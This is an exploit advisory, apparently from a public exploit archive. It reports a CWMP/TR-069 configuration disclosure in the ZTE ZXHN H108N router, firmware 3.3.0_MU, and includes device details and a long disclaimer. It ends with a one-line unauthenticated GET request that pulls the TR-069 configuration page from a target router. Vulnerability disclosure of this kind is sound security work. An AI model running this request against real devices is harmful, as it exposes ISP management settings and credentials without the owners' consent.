ZTE ZXHN H108N version 3.3.0_MU suffers from a CWMP configuration disclosure vulnerability.
2a0797ba5acfc3ee0289de8d4ef17774c784e1c02fafa0180d9adb61c382dae0
# ZTE ZXHN H108N 3.3.0_MU CWMP configuration disclosure
#
# Copyright 2015 (c) Todor Donev
# todor.donev@gmail.com
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
# http://pastebin.com/u/hackerscommunity
#
# Model ZXHN H108N
# Serial Number ZTEERFCD6K03762
# Batch Number T1
# Software Version V3.3.0_MU
# Boot Loader Version V1.0.0
#
# CWMP Description:
# CWMP configuration is accessible only through the
# Administrator account. CWMP is a protocol widely
# used by ISPs worldwide for remote provisioning
# and troubleshooting subscribers' equipment.
# It includes both a safe auto configuration and the
# control of other CPE management functions within
# an integrated framework. The protocol addresses
# the growing number of different Internet access
# devices such as modems, routers, gateways, as well
# as end-user devices which connect to the Internet,
# such as set-top boxes, and VoIP-phones. The TR-069
# standard was developed for automatic configuration
# and management of these devices by
# Auto Configuration Servers (ACS).
#
# Disclaimer:
# This or previous program is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk and educational
# purpose ONLY!
[todor@adamantium ~]$ GET "http://TARGET/net_tr069_basic_t.gch" | grep Transfer_meaning